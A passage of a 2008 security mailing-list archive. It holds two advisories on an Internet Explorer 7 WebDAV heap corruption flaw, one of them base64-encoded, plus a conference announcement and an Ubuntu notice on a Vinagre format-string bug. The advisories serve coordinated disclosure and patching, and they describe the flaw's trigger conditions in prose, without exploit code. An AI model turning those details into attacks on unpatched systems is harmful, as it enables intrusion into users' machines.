b2ludCwgVGhlIFplcm8gRGF5IEluaXRpYXRpdmUgKFpESSkgcmVwcmVzZW50cyANCmEgYmVzdC1v
Zi1icmVlZCBtb2RlbCBmb3IgcmV3YXJkaW5nIHNlY3VyaXR5IHJlc2VhcmNoZXJzIGZvciByZXNw
b25zaWJseQ0KZGlzY2xvc2luZyBkaXNjb3ZlcmVkIHZ1bG5lcmFiaWxpdGllcy4NCg0KUmVzZWFy
Y2hlcnMgaW50ZXJlc3RlZCBpbiBnZXR0aW5nIHBhaWQgZm9yIHRoZWlyIHNlY3VyaXR5IHJlc2Vh
cmNoDQp0aHJvdWdoIHRoZSBaREkgY2FuIGZpbmQgbW9yZSBpbmZvcm1hdGlvbiBhbmQgc2lnbi11
cCBhdDoNCg0KICAgIGh0dHA6Ly93d3cuemVyb2RheWluaXRpYXRpdmUuY29tDQoNClRoZSBaREkg
aXMgdW5pcXVlIGluIGhvdyB0aGUgYWNxdWlyZWQgdnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbiBp
cw0KdXNlZC4gVGlwcGluZ1BvaW50IGRvZXMgbm90IHJlLXNlbGwgdGhlIHZ1bG5lcmFiaWxpdHkg
ZGV0YWlscyBvciBhbnkNCmV4cGxvaXQgY29kZS4gSW5zdGVhZCwgdXBvbiBub3RpZnlpbmcgdGhl
IGFmZmVjdGVkIHByb2R1Y3QgdmVuZG9yLA0KVGlwcGluZ1BvaW50IHByb3ZpZGVzIGl0cyBjdXN0
b21lcnMgd2l0aCB6ZXJvIGRheSBwcm90ZWN0aW9uIHRocm91Z2gNCml0cyBpbnRydXNpb24gcHJl
dmVudGlvbiB0ZWNobm9sb2d5LiBFeHBsaWNpdCBkZXRhaWxzIHJlZ2FyZGluZyB0aGUNCnNwZWNp
ZmljcyBvZiB0aGUgdnVsbmVyYWJpbGl0eSBhcmUgbm90IGV4cG9zZWQgdG8gYW55IHBhcnRpZXMg
dW50aWwNCmFuIG9mZmljaWFsIHZlbmRvciBwYXRjaCBpcyBwdWJsaWNseSBhdmFpbGFibGUuIEZ1
cnRoZXJtb3JlLCB3aXRoIHRoZQ0KYWx0cnVpc3RpYyBhaW0gb2YgaGVscGluZyB0byBzZWN1cmUg
YSBicm9hZGVyIHVzZXIgYmFzZSwgVGlwcGluZ1BvaW50DQpwcm92aWRlcyB0aGlzIHZ1bG5lcmFi
aWxpdHkgaW5mb3JtYXRpb24gY29uZmlkZW50aWFsbHkgdG8gc2VjdXJpdHkNCnZlbmRvcnMgKGlu
Y2x1ZGluZyBjb21wZXRpdG9ycykgd2hvIGhhdmUgYSB2dWxuZXJhYmlsaXR5IHByb3RlY3Rpb24g
b3INCm1pdGlnYXRpb24gcHJvZHVjdC4NCg0KT3VyIHZ1bG5lcmFiaWxpdHkgZGlzY2xvc3VyZSBw
b2xpY3kgaXMgYXZhaWxhYmxlIG9ubGluZSBhdDoNCg0KICAgIGh0dHA6Ly93d3cuemVyb2RheWlu
aXRpYXRpdmUuY29tL2Fkdmlzb3JpZXMvZGlzY2xvc3VyZV9wb2xpY3kvDQoNCkNPTkZJREVOVElB
TElUWSBOT1RJQ0U6IFRoaXMgZS1tYWlsIG1lc3NhZ2UsIGluY2x1ZGluZyBhbnkgYXR0YWNobWVu
dHMsDQppcyBiZWluZyBzZW50IGJ5IDNDb20gZm9yIHRoZSBzb2xlIHVzZSBvZiB0aGUgaW50ZW5k
ZWQgcmVjaXBpZW50KHMpIGFuZA0KbWF5IGNvbnRhaW4gY29uZmlkZW50aWFsLCBwcm9wcmlldGFy
eSBhbmQvb3IgcHJpdmlsZWdlZCBpbmZvcm1hdGlvbi4NCkFueSB1bmF1dGhvcml6ZWQgcmV2aWV3
LCB1c2UsIGRpc2Nsb3N1cmUgYW5kL29yIGRpc3RyaWJ1dGlvbiBieSBhbnkgDQpyZWNpcGllbnQg
aXMgcHJvaGliaXRlZC4gIElmIHlvdSBhcmUgbm90IHRoZSBpbnRlbmRlZCByZWNpcGllbnQsIHBs
ZWFzZQ0KZGVsZXRlIGFuZC9vciBkZXN0cm95IGFsbCBjb3BpZXMgb2YgdGhpcyBtZXNzYWdlIHJl
Z2FyZGxlc3Mgb2YgZm9ybSBhbmQNCmFueSBpbmNsdWRlZCBhdHRhY2htZW50cyBhbmQgbm90aWZ5
IDNDb20gaW1tZWRpYXRlbHkgYnkgY29udGFjdGluZyB0aGUNCnNlbmRlciB2aWEgcmVwbHkgZS1t
YWlsIG9yIGZvcndhcmRpbmcgdG8gM0NvbSBhdCBwb3N0bWFzdGVyQDNjb20uY29tLiANCg=
From - Tue Dec  9 17:19:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f88
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38883-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 6F978EC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 17:11:54 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3E390236FDF; Tue,  9 Dec 2008 14:09:09 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29706 invoked from network); 9 Dec 2008 20:54:07 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-087: Microsoft Internet Explorer Webdav Request Parsing Heap
 Corruption Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF6DCC3A97.5FC40CF4-ON8825751A.00745288-8625751A.00745A4A@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Tue, 9 Dec 2008 15:10:54 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/09/2008 01:11:02 PM,
Serialize complete at 12/09/2008 01:11:02 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA4LTA4NzogTWljcm9zb2Z0IEludGVybmV0IEV4cGxvcmVyIFdlYmRhdiBSZXF1ZXN0IFBh
cnNpbmcgSGVhcCANCkNvcnJ1cHRpb24gVnVsbmVyYWJpbGl0eQ0KaHR0cDovL3d3dy56ZXJvZGF5
aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmllcy9aREktMDgtMDg3DQpEZWNlbWJlciA5LCAyMDA4DQoN
Ci0tIENWRSBJRDoNCkNWRS0yMDA4LTQyNTkNCg0KLS0gQWZmZWN0ZWQgVmVuZG9yczoNCk1pY3Jv
c29mdA0KDQotLSBBZmZlY3RlZCBQcm9kdWN0czoNCk1pY3Jvc29mdCBJbnRlcm5ldCBFeHBsb3Jl
cg0KDQotLSBUaXBwaW5nUG9pbnQoVE0pIElQUyBDdXN0b21lciBQcm90ZWN0aW9uOg0KVGlwcGlu
Z1BvaW50IElQUyBjdXN0b21lcnMgaGF2ZSBiZWVuIHByb3RlY3RlZCBhZ2FpbnN0IHRoaXMNCnZ1
bG5lcmFiaWxpdHkgYnkgRGlnaXRhbCBWYWNjaW5lIHByb3RlY3Rpb24gZmlsdGVyIElEIDY2MTUu
IA0KRm9yIGZ1cnRoZXIgcHJvZHVjdCBpbmZvcm1hdGlvbiBvbiB0aGUgVGlwcGluZ1BvaW50IElQ
UywgdmlzaXQ6DQoNCiAgICBodHRwOi8vd3d3LnRpcHBpbmdwb2ludC5jb20NCg0KLS0gVnVsbmVy
YWJpbGl0eSBEZXRhaWxzOg0KVGhpcyB2dWxuZXJhYmlsaXR5IGFsbG93cyBhdHRhY2tlcnMgdG8g
ZXhlY3V0ZSBhcmJpdHJhcnkgY29kZSBvbg0KdnVsbmVyYWJsZSBpbnN0YWxsYXRpb25zIG9mIE1p
Y3Jvc29mdCBJbnRlcm5ldCBFeHBsb3JlciA3IG9uIHRoZQ0KTWljcm9zb2Z0IFZpc3RhIG9wZXJh
dGluZyBzeXN0ZW0uIFVzZXIgaW50ZXJhY3Rpb24gaXMgcmVxdWlyZWQgdG8NCmV4cGxvaXQgdGhp
cyB2dWxuZXJhYmlsaXR5IGluIHRoYXQgdGhlIHRhcmdldCBtdXN0IHZpc2l0IGEgbWFsaWNpb3Vz
DQpwYWdlLg0KDQpUaGUgc3BlY2lmaWMgZmxhdyBleGlzdHMgZHVyaW5nIGEgV2ViREFWIGZldGNo
IG9mIGEgZG9jdW1lbnQgZnJvbSBhIHBhdGgNCmNvbnRhaW5pbmcgYSBsYXJnZSBudW1iZXIgb2Yg
Y2hhcmFjdGVycy4gTWlzaGFuZGxpbmcgb2YgY2FjaGVkIGNvbnRlbnQNCnJlc3VsdHMgaW4gYSBo
ZWFwIGNvcnJ1cHRpb24gd2hpY2ggY2FuIGJlIGxldmVyYWdlZCB0byBleGVjdXRlIGFyYml0cmFy
eQ0KY29kZSB1bmRlciB0aGUgY29udGV4dCBvZiB0aGUgY3VycmVudCBpbnN0YW5jZSBvZiBJbnRl
cm5ldCBFeHBsb3Jlci4NCg0KLS0gVmVuZG9yIFJlc3BvbnNlOg0KTWljcm9zb2Z0IGhhcyBpc3N1
ZWQgYW4gdXBkYXRlIHRvIGNvcnJlY3QgdGhpcyB2dWxuZXJhYmlsaXR5LiBNb3JlDQpkZXRhaWxz
IGNhbiBiZSBmb3VuZCBhdDoNCg0KaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3RlY2huZXQvc2Vj
dXJpdHkvYnVsbGV0aW4vTVMwOC0wNzMubXNweA0KDQotLSBEaXNjbG9zdXJlIFRpbWVsaW5lOg0K
MjAwOC0wNS0xOSAtIFZ1bG5lcmFiaWxpdHkgcmVwb3J0ZWQgdG8gdmVuZG9yDQoyMDA4LTEyLTA5
IC0gQ29vcmRpbmF0ZWQgcHVibGljIHJlbGVhc2Ugb2YgYWR2aXNvcnkNCg0KLS0gQ3JlZGl0Og0K
VGhpcyB2dWxuZXJhYmlsaXR5IHdhcyBkaXNjb3ZlcmVkIGJ5Og0KICAgICogQnJldHQgTW9vcmUs
IEluc29tbmlhIFNlY3VyaXR5DQoNCi0tIEFib3V0IHRoZSBaZXJvIERheSBJbml0aWF0aXZlICha
REkpOg0KRXN0YWJsaXNoZWQgYnkgVGlwcGluZ1BvaW50LCBUaGUgWmVybyBEYXkgSW5pdGlhdGl2
ZSAoWkRJKSByZXByZXNlbnRzIA0KYSBiZXN0LW9mLWJyZWVkIG1vZGVsIGZvciByZXdhcmRpbmcg
c2VjdXJpdHkgcmVzZWFyY2hlcnMgZm9yIHJlc3BvbnNpYmx5DQpkaXNjbG9zaW5nIGRpc2NvdmVy
ZWQgdnVsbmVyYWJpbGl0aWVzLg0KDQpSZXNlYXJjaGVycyBpbnRlcmVzdGVkIGluIGdldHRpbmcg
cGFpZCBmb3IgdGhlaXIgc2VjdXJpdHkgcmVzZWFyY2gNCnRocm91Z2ggdGhlIFpESSBjYW4gZmlu
ZCBtb3JlIGluZm9ybWF0aW9uIGFuZCBzaWduLXVwIGF0Og0KDQogICAgaHR0cDovL3d3dy56ZXJv
ZGF5aW5pdGlhdGl2ZS5jb20NCg0KVGhlIFpESSBpcyB1bmlxdWUgaW4gaG93IHRoZSBhY3F1aXJl
ZCB2dWxuZXJhYmlsaXR5IGluZm9ybWF0aW9uIGlzDQp1c2VkLiBUaXBwaW5nUG9pbnQgZG9lcyBu
b3QgcmUtc2VsbCB0aGUgdnVsbmVyYWJpbGl0eSBkZXRhaWxzIG9yIGFueQ0KZXhwbG9pdCBjb2Rl
LiBJbnN0ZWFkLCB1cG9uIG5vdGlmeWluZyB0aGUgYWZmZWN0ZWQgcHJvZHVjdCB2ZW5kb3IsDQpU
aXBwaW5nUG9pbnQgcHJvdmlkZXMgaXRzIGN1c3RvbWVycyB3aXRoIHplcm8gZGF5IHByb3RlY3Rp
b24gdGhyb3VnaA0KaXRzIGludHJ1c2lvbiBwcmV2ZW50aW9uIHRlY2hub2xvZ3kuIEV4cGxpY2l0
IGRldGFpbHMgcmVnYXJkaW5nIHRoZQ0Kc3BlY2lmaWNzIG9mIHRoZSB2dWxuZXJhYmlsaXR5IGFy
ZSBub3QgZXhwb3NlZCB0byBhbnkgcGFydGllcyB1bnRpbA0KYW4gb2ZmaWNpYWwgdmVuZG9yIHBh
dGNoIGlzIHB1YmxpY2x5IGF2YWlsYWJsZS4gRnVydGhlcm1vcmUsIHdpdGggdGhlDQphbHRydWlz
dGljIGFpbSBvZiBoZWxwaW5nIHRvIHNlY3VyZSBhIGJyb2FkZXIgdXNlciBiYXNlLCBUaXBwaW5n
UG9pbnQNCnByb3ZpZGVzIHRoaXMgdnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbiBjb25maWRlbnRp
YWxseSB0byBzZWN1cml0eQ0KdmVuZG9ycyAoaW5jbHVkaW5nIGNvbXBldGl0b3JzKSB3aG8gaGF2
ZSBhIHZ1bG5lcmFiaWxpdHkgcHJvdGVjdGlvbiBvcg0KbWl0aWdhdGlvbiBwcm9kdWN0Lg0KDQpP
dXIgdnVsbmVyYWJpbGl0eSBkaXNjbG9zdXJlIHBvbGljeSBpcyBhdmFpbGFibGUgb25saW5lIGF0
Og0KDQogICAgaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmllcy9kaXNj
bG9zdXJlX3BvbGljeS8NCg0KQ09ORklERU5USUFMSVRZIE5PVElDRTogVGhpcyBlLW1haWwgbWVz
c2FnZSwgaW5jbHVkaW5nIGFueSBhdHRhY2htZW50cywNCmlzIGJlaW5nIHNlbnQgYnkgM0NvbSBm
b3IgdGhlIHNvbGUgdXNlIG9mIHRoZSBpbnRlbmRlZCByZWNpcGllbnQocykgYW5kDQptYXkgY29u
dGFpbiBjb25maWRlbnRpYWwsIHByb3ByaWV0YXJ5IGFuZC9vciBwcml2aWxlZ2VkIGluZm9ybWF0
aW9uLg0KQW55IHVuYXV0aG9yaXplZCByZXZpZXcsIHVzZSwgZGlzY2xvc3VyZSBhbmQvb3IgZGlz
dHJpYnV0aW9uIGJ5IGFueSANCnJlY2lwaWVudCBpcyBwcm9oaWJpdGVkLiAgSWYgeW91IGFyZSBu
b3QgdGhlIGludGVuZGVkIHJlY2lwaWVudCwgcGxlYXNlDQpkZWxldGUgYW5kL29yIGRlc3Ryb3kg
YWxsIGNvcGllcyBvZiB0aGlzIG1lc3NhZ2UgcmVnYXJkbGVzcyBvZiBmb3JtIGFuZA0KYW55IGlu
Y2x1ZGVkIGF0dGFjaG1lbnRzIGFuZCBub3RpZnkgM0NvbSBpbW1lZGlhdGVseSBieSBjb250YWN0
aW5nIHRoZQ0Kc2VuZGVyIHZpYSByZXBseSBlLW1haWwgb3IgZm9yd2FyZGluZyB0byAzQ29tIGF0
IHBvc3RtYXN0ZXJAM2NvbS5jb20uIA0K

From - Wed Dec 10 11:39:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004fdf
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38884-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 08F97EC1B6
for <lists@securityspace.com>; Wed, 10 Dec 2008 11:34:13 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 2C28A236FD8; Wed, 10 Dec 2008 09:15:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 5558 invoked from network); 9 Dec 2008 23:15:02 -0000
X-PGP-Universal: processed;
by Invalid on Wed, 10 Dec 2008 12:32:18 +1200
From: "Brett Moore" <brett.moore@insomniasec.com>
To: <bugtraq@securityfocus.com>
Subject: Insomnia : ISVA-081209.1 - IE Webdav Request Parsing Heap Corruption Vulnerability
Date: Wed, 10 Dec 2008 12:32:12 +1300
Message-ID: <009901c95a56$6032f790$2098e6b0$@moore@insomniasec.com>
MIME-Version: 1.0
X-Mailer: Microsoft Office Outlook 12.0
Thread-Index: AclaVlxz34usP9eKQ8C9as4A21yuzQ=Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Language: en-nz
Status:   

__________________________________________________________________

 Insomnia Security Vulnerability Advisory: ISVA-081209.1
___________________________________________________________________

 Name: IE Webdav Request Parsing Heap Corruption Vulnerability 
 Released: 09 December 2008
  
 Vendor Link: 
    http://www.microsoft.com/
  
 Affected Products:
    Microsoft Internet Explorer 7 Running On Vista
    Requires Office 2007
 
 Original Advisory: 
    http://www.insomniasec.com/advisories/ISVA-081209.1.htm
 
 Researcher: 
    Brett Moore, Insomnia Security
    http://www.insomniasec.com
___________________________________________________________________

_______________

 Description
_______________

A vulnerability was found in the way that webdav requests are
cached and then later retrieved by Internet Explorer. This results
in the use of uninitialized memory which under the right situation 
can lead to command execution.

_______________

 Details
_______________

When Internet Explorer loads a file from a webdav share, a copy of
the file is stored in

\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

This copy is used as the cached version of the file, and is loaded 
if a page refresh is done.

If the size of the requested file is larger that 190 characters then
the webdav handling service will not save it correctly.

Internet Explorer assumes that the file was stored, and is cached, so
when a refresh is done it attempts to load the file information from
the cached data.

This leads to a heap corruption with various values read that lead 
to exploitable conditions.

_______________

 Solution
_______________

Microsoft have released a security update to address this issue;
http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx

_______________

 Legals
_______________

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.

___________________________________________________________________
 
Insomnia Security Vulnerability Advisory: ISVA-081209.1
___________________________________________________________________

From - Wed Dec 10 11:49:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004fe0
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38885-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 5D2A6EC1B6
for <lists@securityspace.com>; Wed, 10 Dec 2008 11:46:26 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 73C0F236FEA; Wed, 10 Dec 2008 09:15:50 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6457 invoked from network); 10 Dec 2008 00:16:20 -0000
Date: Tue, 9 Dec 2008 18:33:32 -0600 (CST)
From: Gadi Evron <ge@linuxbox.org>
To: full-dislcosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: ISOI 6, Dallas, TX - January 29, 30
Message-ID: <alpine.DEB.0.999999.0812091832520.15013@linuxbox.org>
User-Agent: Alpine 0.999999 (DEB 847 2007-12-06)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-1.7.5 (linuxbox.org [127.0.0.1]); Tue, 09 Dec 2008 18:33:36 -0600 (CST)
Status:   

Hi all. ISOI is once again happening, and back to the States.

Almost final agenda: http://isotf.org/isoi6.html

As usual, while attendance is limited to the folks who are busy "saving the 
Internet"/"fighting crime", it is free of charge.

Once again we offer the public at-large the opportunity to attend without such 
membership. The process is: you submit a relevant talk, get vetted and get 
accepted. We have two slots reserved for such a purpose.

Subjects of interest: case studies, attacks, botnets, fraud, ...
To submit email your talk idea to contact@isotf.org.

Is it time to say merry Xmas yet?

  Gadi.

From - Wed Dec 10 11:59:52 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004fe3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38886-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 80205EC1C1
for <lists@securityspace.com>; Wed, 10 Dec 2008 11:56:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 743822370C7; Wed, 10 Dec 2008 09:16:03 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6492 invoked from network); 10 Dec 2008 00:19:53 -0000
Date: Tue, 9 Dec 2008 16:37:07 -0800
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-689-1] Vinagre vulnerability
Message-ID: <20081210003707.GD25309@outflux.net>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="/9ZOS6odDaRI+0hI"
Content-Disposition: inline
Organization: Ubuntu
X-MIMEDefang-Filter: outflux$Revision: 1.316 $
X-HELO: www.outflux.net
X-Scanned-By: MIMEDefang 2.63 on 10.2.0.1
Status:   


--/9ZOS6odDaRI+0hI
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================Ubuntu Security Notice USN-689-1          December 10, 2008
vinagre vulnerability
https://launchpad.net/bugs/305623
==========================================================
A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  vinagre                         0.5.1-0ubuntu1.1

Ubuntu 8.10:
  vinagre                         2.24.1-0ubuntu1.1

After a standard system upgrade you need to restart Vinagre to effect
the necessary changes.

Details follow:

Alfredo Ortega discovered a flaw in Vinagre's use of format strings. A
remote attacker could exploit this vulnerability if they tricked a user
into connecting to a malicious VNC server, or opening a specially crafted
URI with Vinagre. In Ubuntu 8.04, it was possible to execute arbitrary
code with user privileges. In Ubuntu 8.10, Vinagre would simply abort,
leading to a denial of service.


Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1.diff.gz
      Size/MD5:     3366 e37fbea9a3ab1fff84daf49c6aaea8dc
    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1.dsc
      Size/MD5:     1246 ade1709a2ee6d44b61310db3c4a23fda
    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_0.5.1.orig.tar.gz
      Size/MD5:  1213849 3d3bc73db7f86286b000906be52aaaa6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1_amd64.deb
      Size/MD5:   686380 0aa6d17d90e44908e9744ec4869d23af

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1_i386.deb
      Size/MD5:   683658 a8fbd34a10ee2b48b0ba6653bb2f4f65

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1_lpia.deb
      Size/MD5:   683584 a74f68064ff76e5ad23dd0b37c67144b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1_powerpc.deb
      Size/MD5:   689330 27586485bdc704afc321a2d1c96a8b74

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_0.5.1-0ubuntu1.1_sparc.deb
      Size/MD5:   684872 2050931666716fd8aff124ad57508de8

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1.diff.gz
      Size/MD5:     5844 643dc942b5a60b89da65b1920f9e79c9
    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1.dsc
      Size/MD5:     1833 f10ff1d6faa1c4ae67c7cc625918d7b8
    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_2.24.1.orig.tar.gz
      Size/MD5:  1519850 d3d421b9d3e76918cf447e00e2ff4aed

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1_amd64.deb
      Size/MD5:  1003668 c3f8746326c23f534d1cb614c3cb9703

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1_i386.deb
      Size/MD5:   994708 925bed98ce092088dc6bd90129cc2c3a

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1_lpia.deb
      Size/MD5:   994026 676aee4fd2e784a38af268e7e86e782f

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1_powerpc.deb
      Size/MD5:  1002480 818e5f672cc5d23822e1fdc16e438338

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/v/vinagre/vinagre_2.24.1-0ubuntu1.1_sparc.deb
      Size/MD5:   998266 2448af1f4c0e05f554d313a0edbcb997